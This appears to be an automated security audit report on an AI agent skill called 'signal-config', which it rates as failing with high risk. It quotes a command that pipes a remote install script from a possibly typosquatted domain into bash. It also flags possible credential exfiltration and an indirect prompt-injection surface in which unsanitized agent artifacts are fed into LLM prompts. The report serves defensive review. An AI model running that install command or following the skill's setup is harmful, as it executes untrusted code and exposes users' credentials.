signal-config
Fail
Audited by Gen Agent Trust Hub on Jun 16, 2026
Risk Level: HIGHEXTERNAL_DOWNLOADSREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONDATA_EXFILTRATIONPROMPT_INJECTION
Full Analysis
- [REMOTE_CODE_EXECUTION]: The skill instructs the agent to install a command-line tool by piping a remote script directly into the bash shell (
curl -fsSL https://cli.promptingco.com/install.sh | bash). This is a critical risk that allows for arbitrary code execution on the user's system. - [EXTERNAL_DOWNLOADS]: The skill downloads executable content from
cli.promptingco.com. This domain is a character-substitution variation of the vendor's ownpromptingcompany.comdomain (omitting 'mpany'), which is a common indicator of typosquatting or impersonation. - [COMMAND_EXECUTION]: The skill executes local system commands for installation (
cp,rm) and utilizes a third-party CLI (tpc) for config validation and authentication. - [DATA_EXFILTRATION]: Because the skill encourages the use of
tpc auth loginalongside a script downloaded from an untrusted domain, there is a high risk of credential harvesting or exfiltration of authentication tokens. - [PROMPT_INJECTION]: The skill contains an indirect prompt injection surface. Ingestion points: It reads untrusted agent run artifacts including
assistantText,userText,codeText, andtoolResults. Boundary markers: It uses simple---separators and${text}interpolation in LLM prompts. Capability inventory: The skill can write files to disk and execute thetpcCLI tool. Sanitization: There is no evidence of filtering or sanitizing the artifact content before it is processed by the model to determine metric values.
Recommendations
- HIGH: Downloads and executes remote code from: https://cli.promptingco.com/install.sh - DO NOT USE without thorough review
- AI detected serious security threats
Audit Metadata